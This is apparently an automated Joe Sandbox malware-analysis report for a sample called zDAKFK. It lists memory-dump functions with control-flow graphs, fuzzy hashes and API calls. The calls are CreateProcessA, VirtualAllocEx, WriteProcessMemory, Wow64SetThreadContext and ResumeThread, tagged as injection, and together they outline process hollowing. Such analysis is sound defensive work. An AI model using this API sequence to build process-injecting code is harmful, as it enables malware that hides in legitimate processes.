                                                                                                                                                                      Function 0509DE50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 665 509de50-509dee5 667 509df1e-509df3e 665->667 668 509dee7-509def1 665->668 675 509df40-509df4a 667->675 676 509df77-509dfa6 667->676 668->667 669 509def3-509def5 668->669 670 509df18-509df1b 669->670 671 509def7-509df01 669->671 670->667 673 509df03 671->673 674 509df05-509df14 671->674 673->674 674->674 677 509df16 674->677 675->676 678 509df4c-509df4e 675->678 682 509dfa8-509dfb2 676->682 683 509dfdf-509e099 CreateProcessA 676->683 677->670 680 509df71-509df74 678->680 681 509df50-509df5a 678->681 680->676 684 509df5c 681->684 685 509df5e-509df6d 681->685 682->683 687 509dfb4-509dfb6 682->687 696 509e09b-509e0a1 683->696 697 509e0a2-509e128 683->697 684->685 685->685 686 509df6f 685->686 686->680 688 509dfd9-509dfdc 687->688 689 509dfb8-509dfc2 687->689 688->683 691 509dfc4 689->691 692 509dfc6-509dfd5 689->692 691->692 692->692 694 509dfd7 692->694 694->688 696->697 707 509e138-509e13c 697->707 708 509e12a-509e12e 697->708 710 509e14c-509e150 707->710 711 509e13e-509e142 707->711 708->707 709 509e130 708->709 709->707 713 509e160-509e164 710->713 714 509e152-509e156 710->714 711->710 712 509e144 711->712 712->710 716 509e176-509e17d 713->716 717 509e166-509e16c 713->717 714->713 715 509e158 714->715 715->713 718 509e17f-509e18e 716->718 719 509e194 716->719 717->716 718->719 721 509e195 719->721 721->721
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0509E086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 6ec930b474d561ad06a4f9f3443c7bf4afc54858d4293f54058a1a32281e8a28
                                                                                                                                                                      • Instruction ID: c647f53e9fbff2cdbb44e80416c481e8e54ac87503b3528e4ea9a0c8a978a9a5
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ec930b474d561ad06a4f9f3443c7bf4afc54858d4293f54058a1a32281e8a28
                                                                                                                                                                      • Instruction Fuzzy Hash: CE916971D00219DFDF24CFA8D842BEDBBF2BB48300F1481A9E849A7254DB749985DF91
                                                                                                                                                                      Function 0509DE47 Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 722 509de47-509dee5 724 509df1e-509df3e 722->724 725 509dee7-509def1 722->725 732 509df40-509df4a 724->732 733 509df77-509dfa6 724->733 725->724 726 509def3-509def5 725->726 727 509df18-509df1b 726->727 728 509def7-509df01 726->728 727->724 730 509df03 728->730 731 509df05-509df14 728->731 730->731 731->731 734 509df16 731->734 732->733 735 509df4c-509df4e 732->735 739 509dfa8-509dfb2 733->739 740 509dfdf-509e099 CreateProcessA 733->740 734->727 737 509df71-509df74 735->737 738 509df50-509df5a 735->738 737->733 741 509df5c 738->741 742 509df5e-509df6d 738->742 739->740 744 509dfb4-509dfb6 739->744 753 509e09b-509e0a1 740->753 754 509e0a2-509e128 740->754 741->742 742->742 743 509df6f 742->743 743->737 745 509dfd9-509dfdc 744->745 746 509dfb8-509dfc2 744->746 745->740 748 509dfc4 746->748 749 509dfc6-509dfd5 746->749 748->749 749->749 751 509dfd7 749->751 751->745 753->754 764 509e138-509e13c 754->764 765 509e12a-509e12e 754->765 767 509e14c-509e150 764->767 768 509e13e-509e142 764->768 765->764 766 509e130 765->766 766->764 770 509e160-509e164 767->770 771 509e152-509e156 767->771 768->767 769 509e144 768->769 769->767 773 509e176-509e17d 770->773 774 509e166-509e16c 770->774 771->770 772 509e158 771->772 772->770 775 509e17f-509e18e 773->775 776 509e194 773->776 774->773 775->776 778 509e195 776->778 778->778
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0509E086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 47981d47d7ac4b01ed83cf274269c60056087fc4472b4dee48b79bef53cef5e4
                                                                                                                                                                      • Instruction ID: e75b3b42d5dc5051e73176c88ba47b44970a060532b946d5879363ed7f296f10
                                                                                                                                                                      • Opcode Fuzzy Hash: 47981d47d7ac4b01ed83cf274269c60056087fc4472b4dee48b79bef53cef5e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 52916971D00219DFDF14CFA8D852BEDBBF2BB48300F1481A9E849A7294DB749985DF92
                                                                                                                                                                      Function 009CB401 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 779 9cb401-9cb41f 780 9cb44b-9cb44f 779->780 781 9cb421-9cb42e call 9cade4 779->781 782 9cb451-9cb45b 780->782 783 9cb463-9cb4a4 780->783 788 9cb444 781->788 789 9cb430 781->789 782->783 790 9cb4a6-9cb4ae 783->790 791 9cb4b1-9cb4bf 783->791 788->780 837 9cb436 call 9cb698 789->837 838 9cb436 call 9cb6a8 789->838 790->791 793 9cb4c1-9cb4c6 791->793 794 9cb4e3-9cb4e5 791->794 792 9cb43c-9cb43e 792->788 795 9cb580-9cb640 792->795 797 9cb4c8-9cb4cf call 9cadf0 793->797 798 9cb4d1 793->798 796 9cb4e8-9cb4ef 794->796 830 9cb648-9cb673 GetModuleHandleW 795->830 831 9cb642-9cb645 795->831 800 9cb4fc-9cb503 796->800 801 9cb4f1-9cb4f9 796->801 799 9cb4d3-9cb4e1 797->799 798->799 799->796 804 9cb505-9cb50d 800->804 805 9cb510-9cb519 call 9cae00 800->805 801->800 804->805 810 9cb51b-9cb523 805->810 811 9cb526-9cb52b 805->811 810->811 812 9cb52d-9cb534 811->812 813 9cb549-9cb54d 811->813 812->813 815 9cb536-9cb546 call 9cae10 call 9cae20 812->815 835 9cb550 call 9cb9a8 813->835 836 9cb550 call 9cb980 813->836 815->813 817 9cb553-9cb556 820 9cb558-9cb576 817->820 821 9cb579-9cb57f 817->821 820->821 832 9cb67c-9cb690 830->832 833 9cb675-9cb67b 830->833 831->830 833->832 835->817 836->817 837->792 838->792
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 009CB666
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 87ddac9976cc375b0264e47fa748cb2e724451d0de7c6ab43d1ecdfe735bd6f2
                                                                                                                                                                      • Instruction ID: 1e9bad1ec5c08c358d9643416ac78c04d156809864e8050c529acbd6eda775f3
                                                                                                                                                                      • Opcode Fuzzy Hash: 87ddac9976cc375b0264e47fa748cb2e724451d0de7c6ab43d1ecdfe735bd6f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 97814670A00B458FD724DF2AD456B5ABBF5FF88304F008A2DE486DBA51DB74E845CB92
                                                                                                                                                                      Function 009C5F54 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 009C6011
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 163489c9ba3031f8fd26ee7ffb513e7ec713b57f0b68ed445a065be07d98b9b4
                                                                                                                                                                      • Instruction ID: 1eabc89ee561bb6651b1f41e3adc7ddd1907c6f2384990162960591f3fd8f64a
                                                                                                                                                                      • Opcode Fuzzy Hash: 163489c9ba3031f8fd26ee7ffb513e7ec713b57f0b68ed445a065be07d98b9b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 1141D1B0C00619CFDB24CFAAC844BDEBBF5BF49304F24816AD408AB255DB756986CF91
                                                                                                                                                                      Function 009C4A18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 009C6011
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 10959a3490eb7a4a9c945ead86af751436d12b9695b74185e1cce59329b88711
                                                                                                                                                                      • Instruction ID: c7c452ce7fb30e894b35f6f47e562ff9b299ca2cbe7c26c2a81d012b7753a9ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 10959a3490eb7a4a9c945ead86af751436d12b9695b74185e1cce59329b88711
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E41C1B0C00619CBDB24DFAAC844BDEBBF9BF49304F24806AD409BB255DB756985CF91
                                                                                                                                                                      Function 0509D7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0509D858
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: f7421cf5e820bb104a0dd622721c5181d7941086a9175fc914f1d5ee2a2462a7
                                                                                                                                                                      • Instruction ID: 5f94eb890746e6f03f169559b85edf1e3477014be56337b4c204e4e457b07692
                                                                                                                                                                      • Opcode Fuzzy Hash: f7421cf5e820bb104a0dd622721c5181d7941086a9175fc914f1d5ee2a2462a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C2146B29003099FCB10CFA9C881BDEBBF5FF48310F10842AE959A7251C778A944CBA4
                                                                                                                                                                      Function 0509D7C0 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0509D858
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: faff9bf6cae98bc4db9636dad792025b9af0f4a530f68d42ecf78567264b8e2d
                                                                                                                                                                      • Instruction ID: 07516afeabee5c3540a41d2c0a09dba30cdd2dd4609e4dfc65fb539ac4214369
                                                                                                                                                                      • Opcode Fuzzy Hash: faff9bf6cae98bc4db9636dad792025b9af0f4a530f68d42ecf78567264b8e2d
                                                                                                                                                                      • Instruction Fuzzy Hash: 7B2144B6D003498FCB04CFA9D8817DEBBF1FB48310F10842AE959A7250C7789994CFA4
                                                                                                                                                                      Function 0509DCB0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0509DD38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 0fc8ed9a54eeb620dc4e1e0cd164007fe125e976b977dcad32e5ac242e11597a
                                                                                                                                                                      • Instruction ID: 7f2065c86cf39e740acb59eaa5875f7d9e43fc07c6daeb5afffa3c3d546410ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 0fc8ed9a54eeb620dc4e1e0cd164007fe125e976b977dcad32e5ac242e11597a
                                                                                                                                                                      • Instruction Fuzzy Hash: 402157B29003499FCB14DF99C880AEEFBF1FF88310F108429E559A7254C7389941DBA5
                                                                                                                                                                      Function 0509D700 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0509D776
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 7c6f9d231a3c13383d4affe7d2a3c0bfc9dc92dee18eaec5fd7ae2d4baf97d5d
                                                                                                                                                                      • Instruction ID: 624a16fd74c35d5c0cc358432e54d35134b39ffa624dd4e760a7079d028cb705
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c6f9d231a3c13383d4affe7d2a3c0bfc9dc92dee18eaec5fd7ae2d4baf97d5d
                                                                                                                                                                      • Instruction Fuzzy Hash: A32179B69002098FCB10DF99D844ADEFFF5EF88320F10842AD569A7250C735A555DFA4
                                                                                                                                                                      Function 0509D630 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0509D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 9f5e8f3e4637813d65f9526aedf68b60f0f994af0d327cbfa9554c7273b76303
                                                                                                                                                                      • Instruction ID: 144aa7a7dd6ae1cba426c382185fd6d280fce84594ffe54bbd6198ff07137bb2
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f5e8f3e4637813d65f9526aedf68b60f0f994af0d327cbfa9554c7273b76303
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D214C71D043098FDB14DFAAC4857EEBBF4EF49314F10842AD559A7240C778A585CFA4
                                                                                                                                                                      Function 0509DCB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0509DD38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 1ecb4698633819c42304d876b68138dacd4c678ec1ed9b1e0d2a538a4afa0181
                                                                                                                                                                      • Instruction ID: 57a744b6eb8c9c718653f9121b77d839f78f6577e224f0fd91e57d9e427f6137
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ecb4698633819c42304d876b68138dacd4c678ec1ed9b1e0d2a538a4afa0181
                                                                                                                                                                      • Instruction Fuzzy Hash: 862128B19003599FCB10DFAAC840ADEFBF5FF88310F10842AE559A7250C7349545DFA5
                                                                                                                                                                      Function 009CD8E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009CD96F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                      • Opcode ID: ee6b0f9d0a259e4d544171c9c167e5b382005d7fc16b025deff194bfc846b8d4
                                                                                                                                                                      • Instruction ID: 8ab9051c0b58b964ad6a8f6c77505f29f843c73fd4fc615d17580aa01a208325
                                                                                                                                                                      • Opcode Fuzzy Hash: ee6b0f9d0a259e4d544171c9c167e5b382005d7fc16b025deff194bfc846b8d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4021C4B5D012589FDB10CF9AD984ADEFBF8EB48310F14841AE954A7350D374A944CFA5
                                                                                                                                                                      Function 0509D629 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0509D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 71a619bb4568acf0b0c0a26825a4ee52801fd09ee6d26392b0df02efdadef984
                                                                                                                                                                      • Instruction ID: e9370ac5d2ef33142617f714cf76ada557149528c2bea6498f78ddad8d52b6e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 71a619bb4568acf0b0c0a26825a4ee52801fd09ee6d26392b0df02efdadef984
                                                                                                                                                                      • Instruction Fuzzy Hash: 882168B2D043098FCB14DFA9C4807EEBBF0AB48314F10842AD559A7240CB38A984CF94
                                                                                                                                                                      Function 0509D578 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 0a0490eb7c11ba1a0d0f4c8150181c2b3981108e86ec56667633abe20fbceea8
                                                                                                                                                                      • Instruction ID: f04d4571fa7a75eaf431e73f0ea2cce58be59181868c43794bd1213258669d83
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a0490eb7c11ba1a0d0f4c8150181c2b3981108e86ec56667633abe20fbceea8
                                                                                                                                                                      • Instruction Fuzzy Hash: 571167B1D042498FCB24DFAAD4457EEFBF4EF88324F10846AD469A7210DB35A941CFA5
                                                                                                                                                                      Function 0509D708 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0509D776
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: ffdded87eb92ac1bc283c5e1ae44769863ac519452983241c281950796dc2555
                                                                                                                                                                      • Instruction ID: 12e0917b27b6b9aee54dac0c74399379f482eeeb793ccd45982bb0e64ad77ec1
                                                                                                                                                                      • Opcode Fuzzy Hash: ffdded87eb92ac1bc283c5e1ae44769863ac519452983241c281950796dc2555
                                                                                                                                                                      • Instruction Fuzzy Hash: 671137B69002499FCB10DFAAC844BDEFFF5EF88320F108419E559A7250C775A544DFA4
                                                                                                                                                                      Function 0509D580 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1772362829.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_5090000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 991162439d4418519b6f9f9bc67d87d6a8a1a7ccc699c34441ae57e19307a224
                                                                                                                                                                      • Instruction ID: 58930b387982e2cd3160f200a121368e5932f0b720fcb7403e92635f3ffc2060
                                                                                                                                                                      • Opcode Fuzzy Hash: 991162439d4418519b6f9f9bc67d87d6a8a1a7ccc699c34441ae57e19307a224
                                                                                                                                                                      • Instruction Fuzzy Hash: A21136B1D043498FCB24DFAAC4457DEFBF4EB88324F20842AD459A7250CB75A984CFA4
                                                                                                                                                                      Function 0E261110 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0E261175
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1775202856.000000000E260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_e260000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 3212bebb3060cceb850346beaa5ebdca93df44b6635a56e10f15a6af6e31ca09
                                                                                                                                                                      • Instruction ID: 1c710aee21706323277e09eb1fd1ae97fa86da72f2e6a476fea2d609a934c449
                                                                                                                                                                      • Opcode Fuzzy Hash: 3212bebb3060cceb850346beaa5ebdca93df44b6635a56e10f15a6af6e31ca09
                                                                                                                                                                      • Instruction Fuzzy Hash: AE1133B5C00349DFDB20DF9AC485BDEBBF4EB48320F10855AE958A7210C375A980CFA5
                                                                                                                                                                      Function 009CB600 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 009CB666
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 48d93c7ed48b798e480c3c63c2f9592c8dc996daf6d8ccbdaad6b515602e4fee
                                                                                                                                                                      • Instruction ID: b7e11e5d661e43b3ec54b69aead667fe2bc8051df3cb3a9e653d809b4668bfbd
                                                                                                                                                                      • Opcode Fuzzy Hash: 48d93c7ed48b798e480c3c63c2f9592c8dc996daf6d8ccbdaad6b515602e4fee
                                                                                                                                                                      • Instruction Fuzzy Hash: 9511E0B6C007498FCB10DF9AC544BDEFBF8AB89324F10852AD459B7210C375A545CFA5
                                                                                                                                                                      Function 0E261118 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0E261175
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1775202856.000000000E260000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E260000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_e260000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: e7ab1eeed866c702af30b74ac4e4a5de6c25171a2dbb991e5c5959bf4f8da69a
                                                                                                                                                                      • Instruction ID: 83f68c836054ff3ba573cf51103d7d19ca523c2367059bdcb76a259113f5a15f
                                                                                                                                                                      • Opcode Fuzzy Hash: e7ab1eeed866c702af30b74ac4e4a5de6c25171a2dbb991e5c5959bf4f8da69a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A11E2B5800349DFDB10DF9AC889BDEFBF8EB48324F14855AE558A7210C375A984CFA5
                                                                                                                                                                      Function 04A97C9C Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
